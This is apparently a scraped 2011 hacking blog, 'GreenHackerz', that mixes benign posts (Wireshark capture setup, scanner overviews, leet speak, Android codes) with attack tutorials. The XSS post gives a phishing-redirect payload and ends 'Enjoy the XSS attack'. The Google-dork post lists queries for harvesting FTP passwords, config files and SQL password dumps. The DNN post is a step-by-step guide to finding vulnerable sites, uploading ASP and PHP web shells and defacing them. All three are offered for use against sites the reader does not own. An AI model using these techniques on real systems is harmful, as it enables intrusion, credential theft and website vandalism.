Start Wireshark. On a Linux or Unix environment, select the Wireshark or Ethereal entry in the desktop environment's menu, or run "wireshark" (or "ethereal") from a root shell in a terminal emulator. In a Microsoft Windows environment, launch wireshark.exe from C:\Program Files\Wireshark.

Note: On Unix systems, a non-GUI version of Wireshark called "tshark" (or "tethereal") may be available as well, but its use is beyond the scope of this document.

Configure Wireshark:

After starting Wireshark, do the following:

1. Select Capture | Interfaces

2. Select the interface on which packets need to be captured.

3. If capture options need to be configured, click the Options button for the chosen interface. Note the following recommendations for traces that are to be analysed by Novell Technical Services.

Capture packet in promiscuous mode: This option allows the adapter to capture all traffic not just traffic destined for this workstation. It should be enabled.
Limit each packet to: Leave this option unset. Novell Support will always want to see full frames.
Filters: Generally, Novell Support prefers an unfiltered trace. For documentation on filters, please refer to TID 10084702 - How to configure a capture filter for Ethereal (formerly NOVL90720).
Capture file(s): This allows a file to be specified to be used for the packet capture. By default Wireshark will use temporary files and memory to capture traffic. Specify a file for reliability.
Use multiple files, Ring buffer with: These options should be used when Wireshark needs to be left running capturing data data for a long period of time. The number of files is configurable. When a file fills up, it it will wrap to the next file. The file name should be specified if the ring buffer is to be used.
Stop capture after xxx packet(s) captured: Novell Technical Support would most likely never use this option. Leave disabled.
Stop capture after xxx kilobyte(s) captured: Novell Technical Support would most likely never use this option. Leave disabled.
Stop capture after xxx second(s): Novell Technical Support would most likely never use this option. Leave disabled.
Update list of packets in real time: Disable this option if the problem that's being investigated is occuring on the same workstation as where Wireshark is running.
Automatic scrolling in live capture: Wireshark will scroll the window so that the most current packet is displayed.
Hide capture info dialog: Disable this option so that you can view the count of packets being captured for each protocol.
Enable MAC name resolution: Wireshark contains a table to resolve MAC addresses to vendors. Leave enabled.
Enable network name resolution: Wireshark will issue DNS queries to resolve IP host names. Also will attempt to resolve network network names for other protocols. Leave disabled.
Enable transport name resolution: Wireshark will attempt to resolve transport names. Leave disabled.

4. Now click the Start button to start the capture

5. Recreate the problem. The capture dialog should show the number of packets increasing. If not, then stop the capture. Examine the interface list and pick the one that is not associated with the WANIP. It will probably be a long alpha-numeric string. If packets are still not being captured, try removing any filters that have been defined.

6. Once the problem which is to be analysed has been reproduced, click on Stop. It might take a few seconds for Wireshark to display the packets captured.

If the destination address is always displayed as FFFFFFFF (IPX) or always ends in .255 (IP) then all that has been captured is broadcast traffic. This is a useless trace.

This usually occurs when another machine is being traced (to start the trace while the target machine is powered off, in order to capture the bootup process). The capture setup needs to be reconsidered - port mirroring on the switch may need to be set up, or a dumb hub may need to be used to make the traffic reach the sniffing system. (Some devices advertised as "hubs" are in fact switches that may have the intelligence to prevent the workstations from seeing each other's packets; with these, getting a good trace may not be possible)

The Wireshark website has a good FAQ on this subject. Please refer to http://www.wireshark.org/faq.html#q7.1

7. Save the packet trace in any supported format. Just click on the File menu option and select Save As. By default Wireshark will save the packet trace in libpcap format. This is a filename with a.pcap extension. Use this default for files sent to Novell.

8. Create a trace_info.txt file with the IP and MAC address of the machines that are being traced as well as any pertinent information, such as:

What is the problem? (when did it start? steps to reproduce? any other pertinent information)
What steps were traced?
Give names of the servers and files being accessed.
If analysis of the trace has already been attempted, please provide Novell Support with analysis notes.

For example: Packets 1-30 are boot. Packets 31-500 are login. Packets 501 to 1,000 is my application

loading. Packet 1,001 to 1,500 is me saving my file. The error occurred at approximately packet 1,480.

Give the MAC addresses of hardware involved? (Workstation, servers, printers ...)
What is the workstation OS and configuration?
What version of client software is running?
If it works with one version of the client (or a particular server patch), then get a trace of it working, and a trace of it not working.
For Novell Client issues: Are there any client patches loaded?
For NetWare servers: What version of NetWare (and other relevant products i.e. ZEN or NDPS) are running on the server?
What patches have been applied?
What is the configuration of the network? Are there routers involved? If so, what kind of routers?

For Downloading the Wireshark, you can directly download it from the Wireshark website. The link is given below:

http://www.wireshark.org/download.html

Hope gives ample information to you and you like it.

Web Vulnerability Assessment

2011-09-23T16:28:00.000+05:30

Hello GreenHackerz..

I hope you all enjoy & learn to be with Us..

Today I'm going to write something about Vulnerability, Vulnerability Assessment & Vulnerability Assessment Tools.. Hope you like it..

So Let's Start..

Vulnerability

In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance.
Vulnerability is the intersection of three elements :

(1) A system susceptibility or flaw

(2) Attacker access to the flaw

(3) Attacker capability to exploit the flaw

To be vulnerable, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface.

Vulnerability Assessment

A vulnerability assessment is the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system.

Web Vulnerability Assessment Essentials: Your First Step to a Highly Secure Web Site

If an organization isn't taking a systematic and proactive approach to web security, and to running a web application vulnerability assessment in particular, then that organization isn't defended against the most rapidly increasing class of attacks. Webbased attacks can lead to lost revenue, the theft of customers' personally identifiable financial information, and falling out of regulatory compliance with a multitude of government and industry mandates: the Payment Card Industry Data Security Standard (PCI) for merchants, HIPAA for health care organizations, or Sarbanes- Oxley for publicly traded companies. In fact, the research firm Gartner estimates that 75 percent of attacks on web security today are aimed straight at the application layer.

Just What Is a Web Application Vulnerability Assessment?

A web application vulnerability assessment is the way you go about identifying the mistakes in application logic, configurations, and software coding that jeopardize the availability (things like poor input validation errors that can make it possible for an attacker to inflict costly system and application crashes, or worse), confidentiality (SQL Injection attacks, among many other types of attacks that make it possible for attackers to gain access to confidential information), and integrity of your data (certain attacks make it possible for attackers to change pricing information, forexample).

Web application vulnerability scanners are very good at what they do: identifying technical programming mistakes and oversights that create holes in web security. These are coding errors, such as not checking input strings, or failure to properly filter database queries, that let attackers slip on in, access confidential information, and even crash your applications. Vulnerability scanners automate the process of finding these types of web security issues; they can tirelessly crawl through an application performing a vulnerability assessment, throwing countless variables into input fields in a matter of hours, a process that could take a person weeks to domanually.

How to Conducting Your Vulnerability Assessment?

To Conduct Web Vulnerability Assessment you must use Acunetix Web Vulnerability Scanner.

You can Download Acunetix Web Vulnerability Scanner from HERE

Acunetix Web Vulnerability Scanner

Introduction :-

Acunetix web vulnerability scanner is a tool designed to discover security holes in your web applications that an attacker would likely abuse to gain illicit access to your systems and data. It looks for multiple vulnerabilities including SQL injection, cross site scripting, and weak passwords.
The application can be used to perform scanning for web and application vulnerabilities and to perform penetration testing against the identified issues. Mitigation suggestions are then provided for each weakness and can be used to increase the security of the web server or application being tested.

Graphical Interfaces :

The Scan Wizard allows you to quickly set-up an automated crawl and scan of your website. An automated scan provides a comprehensive and deep understanding of the level website security by simply reviewing the individual alerts returned.
NOTE: DO NOT SCAN A WEBSITE WITHOUT PROPER AUTHORISATION! The web server logs will show the scans and any attacks made by Acunetix WVS. If you are not the sole administrator of the website please make sure to warn other administrators before performing a scan. Some scans might cause a website to crash requiring a restart of the website.

Select Target(s) to Scan:

(1) Click on ‘File > New > New Website Scan’ to start the Scan Wizard or click on ‘New Scan’ button on the top right hand of the Acunetix WVS user interface.

(2) Specify the target or targets to be scanned. The scan target options are:

Scan single website - Scans a single website. Enter a URL, e.g. http://testphp.acunetix.com, https://.testaspnet.acunetix.com.
Scan using saved crawling results - If you previously performed a crawl on a website and saved the results, you can analyze these results directly without having to crawl the site again. Specify the ‘Saved crawler results’ file by clicking on the folder button.
Scan List of Websites - Scans a list of target websites specified in a plain text file (one target per line). Every target in the file is to be specified in the format <URL> or <URL:port> if the web server is listening on a non default port. The maximum number of websites Acunetix WVS can scan at 1 time is between 20 and 30 sites; depending on the size of the websites.
Scan Range of Computers - This will scan a specific range of IP's (e.g. 192.168.0.10-192.168.0.200) for target sites which are open on the specified ports (Default 80, 81 and 443).

(3) Click 'Next' to continue.

Confirm Targets and Technologies Detected:

Acunetix WVS will automatically probe the target website(s) for basic details such as operating system, web server, web server technologies and whether a custom error page is used (For more details on Custom Error Pages refer to page 26 of this manual).
The web vulnerability scanner will optimize the scan for the selected technologies and use these details to reduce the number of tests performed which are not applicable (e.g. Acunetix WVS will not probe IIS tests on a UNIX system). This will reduce scanning time.
Click on the relevant field and change the settings from the provided check boxes if you would like to add or remove scans for specific technologies

Confirm Targets and Technologies Detected:

Scanning Profile:

The Scanning Profile will determine which tests are to be carried out against the target site. For example, if you only want to test your website(s) for SQL injection, select the profile sql_injection and no additional tests would be performed.

Pros:

Quick scanning
Specify custom error pages
Combines many tools into one application
High detection rate of vulnerabilities
Does not overrate minor vulnerabilities

Cons:

Reporting is not robust
Target identifier appeared to be buggy
Could use some interface tweaks

Hope you all like this... @@@@

How to lock folder without any software.

2011-09-23T13:39:00.002+05:30

Hello GreenHackerz readers.........
The post is funny and knowledgeable, it's about lock the folder without using any software.

You can lock and unlock your folder with this simple trick !
Note: The trick is for windows XP users

The Procedure is as follow :
1. Make a folder on the desktop or any where else as you like and name it (give any name).
2. Now, open notepad and write "ren <your folder name> <again your folder name>.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
(without the double inverted commas) and now go to Notepad Menu File>save as.
3. In the ‘save as’ name it as lock.bat and click save ! (Note: Save this batch file where you create the folder).
4. Now, again open notepad and write "ren <your foldername>.{21EC2020-3AEA-1069-A2DD-08002B30309D} <your folder name>" and again go to Notepad Menu File>save as.
5. In the ‘save as’ name it as key.bat and click save ! (Note: Save this batch file at the same place where you saved the lock.bat and your folder).
6. Now, double click on the lock.bat to lock the folder and now if you open your folder, control panel will open up.
7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again.
8. Lock your folder and hide the key.bat somewhere else on your hard disk.
9. Whenever you want to open your folder just paste the key.bat to the place where is your folder and open your folder using it.

Nice and Funny trick.
Hope you like it.

Hacking Root Password of RedHat based operating System.

2011-09-21T17:52:00.003+05:30

Hello GreenHackerz readers.

The tutorial is for Linux operating system.

The tutorial is all about hacking root password of RedHat / Fedora / or RedHat based Operating System.

When you lost your root password in a RedHat Linux Based systems you should first have access to the console, (the machine itself). For that you have to power on or reboot your machine as needed and wait until you get the following screen (or similar depending your system and configurations).

Note : Here I am using the Fedora operating system but the process is same for all RedHat based system.

Now press 'a' and you will get the following screen......

now, give one space and press key '1' or write 'single' and hit enter button.

you will get the shell prompt screen as shown below

now use the password changing command used in Linux i.e passwd and hit enter . It will directly ask you the new password for user 'root'.

now type reboot and hit enter. you have done .

It will reboot your computer and now login with your new password

thats all..

hope you enjoyed the tutorial.

The Hackers Language - l33t

2011-09-19T14:49:00.001+05:30

Hello Green Hackerz readers....

The Tutorial is about the Language used by the Hackers which is called "Hackers Language".

Language, in short it's a mean to communicate with each other, people generally talk with each other by using sentences, phrases, etc, etc, there are many different languages which can be found spoken all over and around the world. Basically, every different country has its own language, so its not possible for others to communicate with them and also it's very hard for a person to learn every those such languages. For this people had made a common language, which can be used to communicate with each and everyone, i.e., English.

Hackers have also found there own language, which they basically use to communicate with each other.

The Hacker's language used by the hackers to communicate with each other hackers is 'leet'. For example , leet spelling of the word leet include 1337 and l33t. It was originally created by a groups of chatters/gamers in early 1980s, it was developed to frustrate text filters created by BBS or Internet Chat System Operators.

Its a cryptic writing language used to shorten the messages or rather as a form of encryption to hide the actual meaning. The main purpose of this was to prevent others from discouraging them from the discussion of some proscribed topics like hacking, cracking, many more.

Let's read in deep.........

Language helps re-enforce the barrier between computer hackers and non-hackers, as well as that between hackers and crackers. Computer hackers have developed their own language. Firstly there is vocabulary that non-hackers will not know (TCP, IP, winsock, Linux, root access, vi, etc) due to a lack of computer-related knowledge. Secondly, some computer hackers have modified English with a set of conventions. Hackers replace ‘f’ with ‘ph’ (likely coming from phreaks who were interested in ‘ph’ones), and ‘s’ with ‘z’. Also hackers use numbers in place of letters such as ‘1’ for ‘i’ or ‘l’ (though replacing ‘i’ is not the proper usage), ‘3’ for ‘E,’ ‘4’ for ‘a’, and ‘7’ for ‘t.’ Also it is important to use random caPitAlizaTioN, abbreviation, slang, emphasize words by putting ‘k-‘ before them ("k-rad"), and finish a statement with a series of characters for emphasis.

Take this example from an Internet Relay Chat message in a hacking group (#hack):

<elph> c4n sUm1 h31p m3 w1tH h4x0RiNg mY sk00lz c0mPz?!?!?!!?!?

Which translates to: "<elf> can someone help me with hacking my school’s computers?"

Lets take one more example.....

see the below image, the language used here is a leet.

The original is --

Google runs on a unique combination of advanced hardware and software. The speed you experience can be attributed in part to the efficiency of our search algorithm and partly to the thousands of low cost PC's we've networked together to create a superfast search engine. The heart of our software is PageRank (TM), a system for ranking web pages developed by our founders Larry Page and Sergey Brin at Stanford University. And while we have dozens of engineers working to improve every aspect of Google on a daily basis, PageRank continues to provide the basis for all of our web search tools.

According to "Lamer Speak," elf’s statement comes from the warez and crackerz subcultures. "Warez d00dz" are software pirates who are interested in copying the latest program (warez) or game (gamez). Crackers, in this sense, may refer to people who crack software protection or people who crack computer networks. While one will rarely seen this extreme form of the dialect in serious computer hacking circles (thus distinguishing them from crackers and warez d00dz), some of it is widely adopted (notably using ‘ph’ and ‘z’) and thus helps to distinguish them from non-hackers and nostalgic hackers who would never use this dialect. Perhaps newcomers to hacking use this language because they think it will help them gain acceptance, substituting the proper language for their lack of knowledge, by the gate-keeping elite. Or perhaps it is just seen by young teens as a cool way of talking. In real life, elf was banned (i.e. removed) from #hack very promptly after writing that statement. This exclusion is incredibly common, as newcomers are shot-down repeatedly for requesting help in Phrack, on IRC, and on alt.2600 (a hacking Internet discussion group).

You can use this for creating your own

A = 4, /-\, @, ^, /\ , //-\\, ci

B = 8, ]3, ]8, |3, |8, ]]3, 13

C = (, { , [[, <, €

D = ), [}, |), |}, |>, [>, ]]), Ð

E = 3, ii, €

F = |=,(=, ]]=, ph

G = 6, 9, (_>, [[6, &

H = #, |-|, (-), )-(, }{, }-{, {-}, /-/, \-\, |~|, []-[], ]]-[[

I = 1, !, |, ][, []

J = _|, u|, ;_[], ;_[[

K = |<, |{, ][<, ]]<, []<

L = |,1, |_, []_, ][_, £

M = /\/\, |\/|, [\/], (\/), /V\, []V[], \\\, (T), ^^, .\\, //., ][\\//][,

N = /\/, |\|, (\), /|/, [\], {\}, ][\][, []\[], ~

O = 0, (), [], <>, *, [[]]

P = |D, |*, |>, []D, ][D

Q = commas are necessary: (,) or 0, or O, or O\ or []\

R = |2, |?, |-, ]]2 []2 ][2

S = 5, $

T = 7, +, ']‘, 7`, ~|~, -|-, ‘][', "|", †

U = (_), |_|, \_\, /_/, \_/, []_[], ]_[, µ

V = \/ , \\//

W = \/\/, |/\|, [/\], (/\), VV, ///, \^/, \\/\//, 1/\/, \/1/, 1/1/

X = ><, }{, )(, }[

Y = ‘/, %, `/, \j , “//, ¥, j, \|/, -/

Z = 2, z, 7_,`/_

Other than this there are so many converters available on net you can download from the below link.

l33t.exe

Make your own leet & enjoy.
Hope you like the tutorial ...

Cross Site Scripting

2011-09-17T15:51:00.000+05:30

Hello GreenHackerz....

Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn’t intended to do. XSS attacks are very popular and some of the biggest websites have been affected by them including the FBI, CNN, Ebay, Apple, Microsft, and AOL. Some website features commonly vulnerable to XSS attacks are:

• Search Engines

• Login Forms

• Comment Fields

There are three types of XSS attacks:

1. Local – Local XSS attacks are by far the rarest and the hardest to pull off. This attack requires an exploit for a browser vulnerability. With this type of attack, the hacker can install worms, spambots, and backdoors onto your computer.

2. Non-Persistent – Non-persistent attacks are the most common types of attack and don’t harm the actual website. Non-persistent attacks occur when (- a scripting language that is used for client-side web development.) or HTML is inserted into a variable which causes the output that the user sees to be changed. Non-persistent attacks are only activated when the user visits the URL crafted by the attacker.

3. Persistent – Persistent attacks are usually used against web applications like guest books, forums, and shout boxes. Some of the things a hacker can do with a persistent attacks are:

• Steal website cookies (Cookies are used by web browsers to store your user information so that you can stay logged into a website even after you leave. By stealing your cookie, the attacker can sometimes login without knowing your password.)

• Deface the website

• Spread Worms

Now that you know what cross site scripting is, how can you tell if a website if vulnerable to it?

1. If there is a search field, enter a word and if that word is displayed back to you on the next page, there’s a chance it is vulnerable.

2. Now we will insert some HTML. Search for <h1>hi</h1>, and if the word “hi” is outputted as a big header, it is vulnerable.

3. Now we will insert JavaScript. Search for <script>alert(“hi”);</script> , if the word “hi” pops up in a popup box, then the site is vulnerable to XSS.

4. As you can see, these examples are non-persistent. Now if a hacker found a guestbook or something else like it that was vulnerable, he would be able to make it persistent and everyone that visits the page would get the above alert if that was part of his comment.

Hackers knowledgeable in JavaScript and PHP will be able to craft advanced XSS attacks to steal your cookies and spread XSS worms, but to show you a simple example of something more realistic then the above examples, I will show you how a hacker could use XSS to help with phishing.

1. Let’s say a hacker wants to phish passwords from www.victim-site.com. If he was able to find an XSS vulnerability anywhere on the website, he would be able to craft a link pointing to the legit website that redirects to his phishing website.

2. In the example with the popup, when I inserted the JavaScript into the search box, a URL was formed that looked like the following:

Here you can see that the code you typed into the search box was passed to the “searchbox” variable.

3. In the URL the hacker would then replace everything in between ?searchbox= and &search with the following JavaScript code:

<script>window.location = “http://phishing-site.com”</script>

4. Now when you go to the finished link, the legitimate site will redirect to the phishing website. Next what the hacker would do is encode the URL to make it look more legit and less suspicious. You can encode the URL at http://www.encodeurl.com/ .

5. My finished encoded URL is: http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21

6. Once the victim sees that the link points to the legitimate website, he will be more likely to fall for the phishing attack.

Good Luck.
Enjoy the XSS attack...

Five Great Anti-Keylogger To Stop Keyloggers

2011-09-17T14:06:00.000+05:30

Hello GreenHackerz....

These days Cyber crime has crossed its all limits. These days’ hackers are trying to find out the new ways to tease innocent people. One of those few ways which hackers had discovered is Keylogging. Keylogging is sometime also called Keystroke Logging.

keylogger is a hardware device or a software program that records the real time activity of a computer user including the keyboard keys they press.

Keylogging means hacking way in which the hacker sends a key logger in your computer and it activates itself as soon as it reaches your computer and works secretly. It sends your PC’s every key stroke or key stroke (key you press) to the hacker.

Detecting the presence of a keylogger on a computer can be difficult.So to defend people against keyloggers, ethical hackers have designed its contradictory part called anti-keyloggers. You need to install it on your computer and then it either finds all the keyloggers on your computer and delete them or encrypt your key strokes.

So Today I'm going to Discuss about Top Five Anti-Keylogging Softwares.

ZEMANA KEYLOGGER

Zemana AntiLogger is one of the most famous,reliable and worth giving Anti-Keylogger in the market. Zemana Anti-KeyLogger will definitely remove all the keyloggers from your computer, this software also not costs you too much.This will also stop the hackers to monitor your screen.

DATAGUARD ANTIKEYLOGGER

DataGuard Anti-Keylogger is a anti-keylogger which detects and disables all types keylogger in your computer.It works on cutting-edge heuristics methods.DataGurad Anti-Keylogger is a user friendly anti-keylogger too.

GUARDEDID PREMIUM

GuardedID Premium is a great and a handy anti-keylogger which is very cheap and reliable. This software provides you the user friendly environment and this software encrypts all the things you type.

CODEFENDER

CoDefender was developed by an Sydney based company called Encassa.It is robustly trusted by the users.It encrypts all the words you type and hence no one come to know what you typed!

PRIVACY KEYBOARD

PrivacyKeyboard works really interestingly it don’t perform any type of scans which will detect Keyloggers on your computer ; it stops all the keystrokes to intercepted to the hacker. Privacy Keyboard is also a reliable Anti-Keylogger.

So Now You all Greenhackerz get secured from Spywares & Keyloggers..

Enjoy Anti-Keylogging @@@@@@@

Windows 8 Developer Preview !!!

2011-09-15T13:52:00.000+05:30

Windows 8 Developer Preview Download & Installation...

Hello GreenHackerz..

Wait is over now.Microsoft has made an early version of Windows 8 to developers and the tech press. Here's what the new operating system brings so far.

Microsoft is using this conference to mainly talk about the next version of Windows which is Windows 8. There have been some leaked copies of Windows 8 but this week Microsoft released the first official release.

The release is a pre-beta released called the Developers Preview and it is not feature complete and still has some things that need to be fixed but it does give us an image to download and start testing and having fun with.

You can download the image from Microsoft.

I Personally prefer virtual machines So That is the method I used.So off we go for the screenshot of the install

Three Options to select from; for this initial install I'm going with the full install. Future posts will focus on the Server Core and Features On Demand versions.

Obligatory EULA which I fully read :)

Choose Custom (advanced installation)

I usually use around 40 GB for my virtual machines but you technically only need 32 GB of disk space. Additional information on the system requirements can be found here:

Windows Server 8 Developer Preview - System Requirements

The familiar installing Windows dialogue box. Glad some things don't change.

Getting close to being finished.

Enter a password

Moment of truth has arrived, initial screen for Windows Server 8. It gets me excited as I know I'll be spending years of my life using this OS but this is my first install.

There are two screens you will see when initially working with Windows 8. The first is the MetroUI that a lot of people have seen in previews on the Windows 8 blog and other sources. This is the tile interface

MetroUI GUI in Windows Server 8 Developers Preview

You can use the Windows Key to get to the more familiar desktop

It is a new OS with a lot of graphical changes that are going to take time to get used to it. For old timers over 35 like me the transition from NT to Windows 2000 was also dramatic. Remember going from server manager and user manager to AD Users and Computers.

I'm guessing there is a Group Policy to disable MetroUI and that will be a future posts but for now I'm leaving it on and getting used to it.

Enjoy Windows 8 ... @@@@@

Android Phone's Hidden Secret Codes

2011-08-12T16:22:00.011+05:30

Hello GreenHackerz....

Today I'm going to show you some Hidden Secret Codes that can be used in Google Android Phone

This information is intended for experienced users. Not intended for basic users, hackers, or mobile phone thieves. Please do not try any of the following methods if you are not familiar with the phone. We will not be liable for any use or misuse of this information, including data loss or hardware damage. So, there are risks in your own hands.

So, in this topic, you will get Some Hidden Secret Code that can be used in the Google Android Phone, Access to things that are not accessible by default. :)

* # * # 4636 # * # *

This code can be used to obtain some interesting information about your phone and battery. This suggests the following four on-screen menu:

(1) Information Phone

(2) Battery information

(3) History of Batteries

(4) Usage Statistics

* # * # 7780 # * # *

This code can be used to reset data such as origin. This will delete the following things:

(1) Google account settings are stored in your phone

(2) System and application data and settings

(3) Applications that were NOT going to download and delete:

(4) Current software systems and application packages

(5) Card SD files such as photos, music files, etc.

NOTE: After you provide this code, you get a prompt screen asking you to click on the button “Reset Phone”. So you get a chance to cancel your Surgery.

* 2767 * 3855 #

Think before you give this code. This code is used for formatting the original manufacturer. This will delete all files and settings, including internal memory storage. This will also reinstall the phone’s firmware.

NOTE: After you provide this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving these codes.

# * # 34971539 # * # *

This Code is used to Obtain Information about Camera Phones. This suggests the following four menus:

(1) Update the camera firmware in the picture (Do not try this option)

(2) Update the camera firmware in the SD card

(3) Get the camera firmware version

(4) Obtain a count of firmware updates

WARNING: Do not uses the first option is declared, the camera phone will stop working and you will need to take your phone to a service center / shop to reinstall the firmware of the Camera.

* # * # 7594 # * # *

This one is one of my favorites. This code can be used to change the “End Call / Power” action on your phone keypad. So the default, if you press the button for a moment, it will display a screen that asks you to select options from the Silent mode, and Turn off Airplane mode phone.

You can change the action using this code. You can activate this power directly from the button so you do not have to waste your time in choosing the option.

* # * # 273 283 * 255 * 663 282 *#*#*

This code will open a copy of the screen where you can file for backup media files such as image, voice, video and voice memos.

* # * # 197328640 # * # *

This code can be used for entry into service mode. You can run various tests and setting changes in service mode.

Test Code: WLAN, GPS and Bluetooth :

* # * # 232 338 # * # * Displays the MAC address of WiFi

* # * # 1472365 # * # * GPS test

* # * # 1575 # * # * Test a GPS who others are.

* # * # 232 331 # * # * Bluetooth test

* # * # 232 337 # * # Displays the Bluetooth address

* # * # 8255 # * # * This code can be used to launch GTalk Service Monitor.

Code to get the firmware version information:

* # * # 4986 * 2650468 # * # * PDA, phone, H / W, RFCallDate

* # * # 1234 # * # * PDA and Phone

* # * # 1111 # * # * FTA SW Version

* # * # 2222 # * # * FTA HW Version

* # * # 44 336 # * # * PDA, Phone, CSC, Build Time, Changelist number.

Code to launch various tests Factory:

* # * # 0283 # * # * Loopback packet

* # * # 0 *#*#* LCD test

* # * # 0673 # * # * or * # * # 0289 # * # * Melody tests

* # * # 0842 # * # * Test Device (Vibration test and Backlight)

* # * # 2663 # * # * Touch screen version

* # * # 2664 # * # * Touch screen test

* # * # 0588 # * # * Proximity sensor test

* # * # 3264 # * # * RAM version

NOTE: All the above code has been tested on Google Android phones Samsung I7500 Galaxy. should also function on the Google Android phone else.

Advanced Password Hacking Using Google ...

2011-08-03T14:33:00.001+05:30

Hello GreenHackerz...

Google is your best friend when it comes to hacking. The search engine giant has crawled loads of data which was intended to be protected by webmasters, but is being exploited and mined by smart users using Google dorks. Today I will be discussing some practical dorks which will help you gain passwords, databases and vulnerable directories. The basic methodology remains the same, query Google using specialized dorks with precise parameters and you are good to go.

I assume you have basic working knowledge of google dorks.

Lets start, shall we ?

FTP Passwords

ws_ftp.ini is a configuration file for a popular win32 FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference.

intitle:index.of ws_ftp.ini

You can also this dork which uses "parent directory" to avoid results other than directory listings

filetype:ini ws_ftp pwd
Or
"index of/" "ws_ftp.ini" "parent directory"

even if the site or file has been taken offlline, you can still search the contents in the Google cache using the following dork

"cache:www.abc.com/ws_ftp.ini"
where
www.abc.com is the site you want to check the dork for.

The ws_ftp password uses quite weak encryption algorithm, hence once you get the password, you can break it using the decryptor provided here or from here.

PHP Hacking

Sites made in PHP have a file known as “config.php” which stores configuration and the username and password for the sql database the site is hosting. This password is required only once per transaction (i.e when ever admin logins or a transaction is committed at administrator level) and hence will be specified by the ‘require_once’ parameter in the config file or in index file.

intitle:index.of config.php

to view php file contents

intitle:"Index of" phpinfo.php

you can also try the directory traversal attack in php using the following dork

inurl:download.php?=filename

if you are lucky, substitute the filename with ‘index.php’, download it, read it and get the password (hint:if you are not able to find it, try looking for globals.php).
Since most websites today deny this trick, but you may get lucky with some :)

SQL Dumps

We will be hunting for SQL password dumps saved in database, here ext:sql specifies the type of password dump, e10adc3949ba59abbe56e057f20f883e is the md5 hash for 123456; one of the most common password people keep..and intext dork will allows to search inside the dump.

ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e

ext:sql intext:"INSERT INTO" intext:@somemail.com intext:password

Remember Friends

(1) Use different email providers, substitute gmail/yahoomail instead of somemail ,or try custom domain mail providers.

(2) Use different file extensions.

(3) Use different type of hashes, some older ones might be using md4 and some others might be using other prominent encryption algorithms.

(4) Just mix everything up and try different combinations :)

Its not over..Yet

A very flexible query can be used to hunt for WS_FTP.log which in turn can disclose valuable information about the server.

+htpasswd +WS_FTP.LOG filetype:log

You can substitute "+htpasswd" for "+FILENAME" & you may get several results not mentioned before using the normal search. You can further explore filenames by using keywords like

phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet

The list goes on and on..

Also you cam try this dork to data mine information about the uploader

"allinurl: "some.host.com" WS_FTP.LOG filetype:log"

which tells you more about who's uploading files to a specific site, quite handy for some passive reconnaissance.

You can do it using some software like Google Hacks..but remember, manual way is the way to go. I may have included some software specific password mining, but that would cripple your imagination.

Go postal by using your imagination and developing your own dorks and queries.
I guess that was enough for this time...

Happy Password Hacking @@@@

Grendel Scan: Open Source Web Application Security Scanner

2011-07-12T17:17:00.004+05:30

Hello GreenHackerz ...

Today I'm going to post a very good tool for Penetration Testing and its Name is Grendel Scan..

Grendel-Scan is an open-source web application security testing tool. It has automated testing module for detecting common web application vulnerabilities, and features geared at aiding manual penetration tests. The only system requirement is Java 5; Windows, Linux and Macintosh builds are available.

Whats special about Grendel Scan you might ask? First of all, it is OPEN SOURCE. Second, it is FREE. Third, it is only one of those scanners which allows automatic 404 error detection. Fourth, it is Multi-Platform.

Do we have your attention yet?Okay.. moving on to some more meatier stuff.

These are a few of the functions that the Grendel Scan performs:

Internal intercepting / testing proxy
HTTP request fuzzer
Manual requests
Automatic file-not-found profiles
Upstream proxy support
HTTP request & connection throttling
HTML form-based authentication; multiple user accounts
Granular scan settings
Blocked query parameters
URL white-lists & blacklists
Known session ID names

In addition to all of these, it has built in modules for the following:

SQL injection
Error-based checks
SQL tautologies – experimental
Miscellaneous tests
CRLF injection
Cross-site request forgery (CSRF) tests
Directory traversal tests
Generic fuzzing
Information Leakage
Platform error messages
Robots.txt testing
Comment lister
Web server configuration
Cross-site tracing (XST)
Proxy detection
Application architecture
Input / output flows
Offline website mirror

In short, it is an automated testing tool for detecting common web application vulnerabilities. It can also aid in manual testing as it has a intercepting proxy module.

All you need is Java 5 and above!

Downloadthis tool here!

Leave your comments & Suggestion @@@

Enjoy Penetration Testing @@@@

How To Deface A Website | DNN (DotNetNuke) HACKING

2011-05-06T14:27:00.003+05:30

Hello Green Hackerz,

Today I will explain another hacking technique known as DNN (DotNetNuke).

I will show you how to hack a DNN website.

Is it easy??? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.

I will teach you how to find your target and how to enter into the target website and upload your files.

WHAT IS DNN ?

DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

Some easy Steps to implement Attack..

Things you will need:

An ASP Shell

PHPJackal OR C99 Shell

Some nice Deface pages.

To Download above files Click Here

So after you Download Needed files. Find the Vulnerable Website by using Google Dork.

Go to Google and type

inurl:fcklinkgallery.aspx

Now you will see lots of websites.

Pick anyone.

Now you will see something like this:

Press File.

Now you will probably see something like this:

Ok so now you go to your address bar and paste this Code & Hit Enter :

Code:

javascript:__doPostBack('ctlURL$cmdUpload','')

Now You Will See Something Like this :

Yes Now We Can Upload Files From Our Compuetr :

Press Browse Open Downloaded files and select shell.asp;me.jpg and click Upload selected files.

Yeah

We have Uploaded our ASP Shell.

Now to navigate to our shell,goto

Code:

http://www.TARGETSITE.com/portals/0/shell.asp;me.jpg

You Will Get This :

Now you can upload your PHPJackal Shell ( included in the Everything you need.rar thing).

Now navigate to

Code:

http://www.TARGETSITE.com/portals/0/jackalshell.php

And rename one of the deface pages (the pages that were in the Everything you need thing) too index.html and upload it on the root of the site.

You have now defaced a site.

Wait Wait Wait

Not Only This Even you can control the root of the server

See This :

And Now Click on the Website you see like this :

Now You Control all the website which is on that server

Now you Get This..

OK Friends....

Leave Your Comments & Feedbacks...

